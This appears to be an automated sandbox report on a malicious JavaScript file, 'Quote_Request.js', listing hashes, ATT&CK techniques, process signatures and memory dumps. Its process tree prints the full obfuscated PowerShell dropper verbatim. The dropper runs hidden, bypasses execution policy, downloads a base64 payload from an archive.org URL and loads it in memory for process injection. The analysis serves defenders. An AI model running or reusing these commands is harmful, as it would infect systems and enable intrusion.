21f90e0d5e6ecb036950ec462cd6eed6b17b1a231a6220fbc1dda80c118f8b1f

General

Target

Quote_Request.js
Size

320KB
MD5

409a098455597d7cbc0c56bc2d37f4b5
SHA1

b46f9a53e7fe7ce357a2a4b8d0e0949da320aeea
SHA256

21f90e0d5e6ecb036950ec462cd6eed6b17b1a231a6220fbc1dda80c118f8b1f
SHA512

9709d7ca61ea365fbb2612cea61b2fcb8e4f45af4bd98caf5900ee26ec855cc5b43158073933ebf09f6e78f472c617ccbbe77ea9b235311c7be4aa7b04e71ba7
SSDEEP

6144:c5VUO+uOGvqHKB+X/AUVUFCiaiYQAjOZLzDrQI2e6tYppEQNCo0jV92z6IqWm+W+:075OGvqHKIYU6FCia3QkOVzoIymnxCRu

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt

exe.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	2572	powershell.exe
4	2572	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2776	powershell.exe
2572	powershell.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2776	powershell.exe
2572	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2776	powershell.exe
Token: SeDebugPrivilege	2572	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2692 wrote to memory of 2776	2692	wscript.exe	30
PID 2692 wrote to memory of 2776	2692	wscript.exe	30
PID 2692 wrote to memory of 2776	2692	wscript.exe	30
PID 2776 wrote to memory of 2572	2776	powershell.exe	32
PID 2776 wrote to memory of 2572	2776	powershell.exe	32
PID 2776 wrote to memory of 2572	2776	powershell.exe	32

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Quote_Request.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2692
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAnAEUATQBmAHUAcgBsACcAKwAnACAAPQAgADMAJwArACcAbgA2AGgAdAB0ACcAKwAnAHAAcwA6ACcAKwAnAC8ALwAnACsAJwBpAGEAOQAwADQANgAwADEALgB1AHMAJwArACcALgBhAHIAJwArACcAYwBoAGkAJwArACcAdgBlAC4AJwArACcAbwByAGcALwAnACsAJwA2ACcAKwAnAC8AaQB0ACcAKwAnAGUAJwArACcAbQAnACsAJwBzAC8AZABlAHQAYQAnACsAJwBoACcAKwAnAC0AJwArACcAbgBvAHQAZQAtAGoALwBEACcAKwAnAGUAdABhAGgATgAnACsAJwBvAHQAZQBKAC4AdAB4AHQAMwBuADYAOwAnACsAJwBFAE0AZgBiACcAKwAnAGEAcwBlADYAJwArACcANABDAG8AJwArACcAbgB0ACcAKwAnAGUAbgB0ACAAJwArACcAPQAgACgAJwArACcATgBlACcAKwAnAHcAJwArACcALQAnACsAJwBPAGIAagBlAGMAdAAgAFMAeQBzACcAKwAnAHQAZQAnACsAJwBtACcAKwAnAC4ATgBlAHQALgBXACcAKwAnAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQAnACsAJwBkACcAKwAnAFMAdAAnACsAJwByAGkAbgBnACgARQBNAGYAJwArACcAdQByACcAKwAnAGwAKQAnACsAJwA7AEUATQBmACcAKwAnAGIAaQBuAGEAJwArACcAcgAnACsAJwB5AEMAbwBuAHQAZQAnACsAJwBuACcAKwAnAHQAIAA9ACAAJwArACcAWwBTAHkAcwAnACsAJwB0ACcAKwAnAGUAJwArACcAbQAnACsAJwAuACcAKwAnAEMAbwBuACcAKwAnAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgAnACsAJwByAG8AbQBCAGEAcwBlACcAKwAnADYAJwArACcANABTAHQAcgBpAG4AJwArACcAZwAoAEUATQBmACcAKwAnAGIAJwArACcAYQBzAGUAJwArACcANgA0ACcAKwAnAEMAbwBuAHQAZQAnACsAJwBuAHQAKQAnACsAJwA7AEUATQAnACsAJwBmAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbACcAKwAnAFIAZQBmAGwAZQBjACcAKwAnAHQAJwArACcAaQBvAG4ALgBBAHMAJwArACcAcwBlAG0AJwArACcAYgBsAHkAXQA6ADoAJwArACcATABvAGEAJwArACcAZAAoAEUATQBmAGIAJwArACcAaQBuAGEAcgB5AEMAJwArACcAbwAnACsAJwBuAHQAZQBuACcAKwAnAHQAKQA7ACcAKwAnAEUATQBmAHQAeQBwAGUAIAA9ACAAJwArACcARQBNAGYAYQBzAHMAJwArACcAZQBtAGIAbAB5AC4ARwBlAHQAJwArACcAVAB5AHAAZQAoADMAbgA2AFIAdQAnACsAJwBuAFAARQAuAEgAbwAnACsAJwBtACcAKwAnAGUAMwBuADYAKQAnACsAJwA7ACcAKwAnAEUATQBmACcAKwAnAG0AZQB0AGgAbwBkACAAJwArACcAPQAgAEUATQBmAHQAJwArACcAeQBwAGUALgBHAGUAdAAnACsAJwBNAGUAdAAnACsAJwBoACcAKwAnAG8AZAAnACsAJwAoADMAbgA2ACcAKwAnAFYAJwArACcAQQAnACsAJwBJADMAbgA2ACkAJwArACcAOwAnACsAJwBFAE0AJwArACcAZgBtAGUAJwArACcAdABoACcAKwAnAG8AZAAuAEkAbgB2AG8AawAnACsAJwBlACgAJwArACcARQBNAGYAbgB1ACcAKwAnAGwAbAAsACAAWwAnACsAJwBvAGIAagAnACsAJwBlAGMAdABbACcAKwAnAF0AJwArACcAXQBAACgAMwBuADYAdAB4AHQALgAnACsAJwBnAG4AYQByACcAKwAnAC8AdgBlAGQALgAyAHIALgAzADkAYgAzADQAJwArACcANQAzADAAMgBhADAANwAnACsAJwA1AGIAMQAnACsAJwBiAGMAJwArACcAMABkADQANQBiADYAJwArACcAMwAyAGUAYgA5AGUAZQA2ADIALQAnACsAJwBiACcAKwAnAHUAcAAvAC8AJwArACcAOgBzACcAKwAnAHAAdAAnACsAJwB0AGgAJwArACcAMwBuADYAJwArACcAIAAnACsAJwAsACAAMwBuADYAZABlAHMAJwArACcAYQB0AGkAJwArACcAdgBhAGQAbwAzAG4ANgAgACcAKwAnACwAIAAzAG4ANgBkAGUAcwBhAHQAJwArACcAaQAnACsAJwB2AGEAZABvADMAbgA2ACAAJwArACcALAAgADMAJwArACcAbgA2AGQAZQBzAGEAdABpACcAKwAnAHYAYQBkAG8AMwAnACsAJwBuADYAJwArACcALAAzAG4ANgAnACsAJwBBACcAKwAnAGQAZAAnACsAJwBJACcAKwAnAG4AJwArACcAUAByAG8AYwBlAHMAJwArACcAcwAzADIAMwBuACcAKwAnADYALAAzAG4AJwArACcANgAnACsAJwBkAGUAcwAnACsAJwBhACcAKwAnAHQAJwArACcAaQAnACsAJwB2AGEAZAAnACsAJwBvADMAbgA2ACcAKwAnACkAKQA7ACcAKQAuAHIAZQBQAEwAQQBjAEUAKAAoAFsAQwBoAEEAcgBdADUAMQArAFsAQwBoAEEAcgBdADEAMQAwACsAWwBDAGgAQQByAF0ANQA0ACkALABbAHMAdABSAEkAbgBHAF0AWwBDAGgAQQByAF0AMwA5ACkALgByAGUAUABMAEEAYwBFACgAJwBFAE0AZgAnACwAJwAkACcAKQB8AC4AKAAgACQAUABTAGgATwBtAEUAWwA0AF0AKwAkAFAAcwBIAE8ATQBFAFsAMwAwAF0AKwAnAFgAJwApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2776
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('EMfurl'+' = 3'+'n6htt'+'ps:'+'//'+'ia904601.us'+'.ar'+'chi'+'ve.'+'org/'+'6'+'/it'+'e'+'m'+'s/deta'+'h'+'-'+'note-j/D'+'etahN'+'oteJ.txt3n6;'+'EMfb'+'ase6'+'4Co'+'nt'+'ent '+'= ('+'Ne'+'w'+'-'+'Object Sys'+'te'+'m'+'.Net.W'+'ebClient).Downloa'+'d'+'St'+'ring(EMf'+'ur'+'l)'+';EMf'+'bina'+'r'+'yConte'+'n'+'t = '+'[Sys'+'t'+'e'+'m'+'.'+'Con'+'ver'+'t]:'+':F'+'romBase'+'6'+'4Strin'+'g(EMf'+'b'+'ase'+'64'+'Conte'+'nt)'+';EM'+'fassembly = ['+'Reflec'+'t'+'ion.As'+'sem'+'bly]::'+'Loa'+'d(EMfb'+'inaryC'+'o'+'nten'+'t);'+'EMftype = '+'EMfass'+'embly.Get'+'Type(3n6Ru'+'nPE.Ho'+'m'+'e3n6)'+';'+'EMf'+'method '+'= EMft'+'ype.Get'+'Met'+'h'+'od'+'(3n6'+'V'+'A'+'I3n6)'+';'+'EM'+'fme'+'th'+'od.Invok'+'e('+'EMfnu'+'ll, ['+'obj'+'ect['+']'+']@(3n6txt.'+'gnar'+'/ved.2r.39b34'+'5302a07'+'5b1'+'bc'+'0d45b6'+'32eb9ee62-'+'b'+'up//'+':s'+'pt'+'th'+'3n6'+' '+', 3n6des'+'ati'+'vado3n6 '+', 3n6desat'+'i'+'vado3n6 '+', 3'+'n6desati'+'vado3'+'n6'+',3n6'+'A'+'dd'+'I'+'n'+'Proces'+'s323n'+'6,3n'+'6'+'des'+'a'+'t'+'i'+'vad'+'o3n6'+'));').rePLAcE(([ChAr]51+[ChAr]110+[ChAr]54),[stRInG][ChAr]39).rePLAcE('EMf','$')|.( $PShOmE[4]+$PsHOME[30]+'X')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2572

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
1a44d8bd6b210ae316b30f299dec262c

SHA1
06e08766dc5be9579dd202fe113a148d835c1180

SHA256
da55b961951cab064af3529556a73695b1f6ee043653e8cba7d7afc2d14483bd

SHA512
6038131fa15316275fc33a9939f5bcc04dc3f7de0028418af62bce1095a39af165bc52c54437325856dbe3ec3aea791d11b056e818f412ccc519605913b9ece6

Download Submit
memory/2776-4-0x000007FEF5ECE000-0x000007FEF5ECF000-memory.dmp

Filesize
4KB

Download
memory/2776-6-0x0000000001D80000-0x0000000001D88000-memory.dmp

Filesize
32KB

Download
memory/2776-5-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

Filesize
2.9MB

Download
memory/2776-7-0x000007FEF5C10000-0x000007FEF65AD000-memory.dmp

Filesize
9.6MB

Download
memory/2776-9-0x000007FEF5C10000-0x000007FEF65AD000-memory.dmp

Filesize
9.6MB

Download
memory/2776-8-0x000007FEF5C10000-0x000007FEF65AD000-memory.dmp

Filesize
9.6MB

Download
memory/2776-10-0x000007FEF5C10000-0x000007FEF65AD000-memory.dmp

Filesize
9.6MB

Download
memory/2776-16-0x000007FEF5C10000-0x000007FEF65AD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing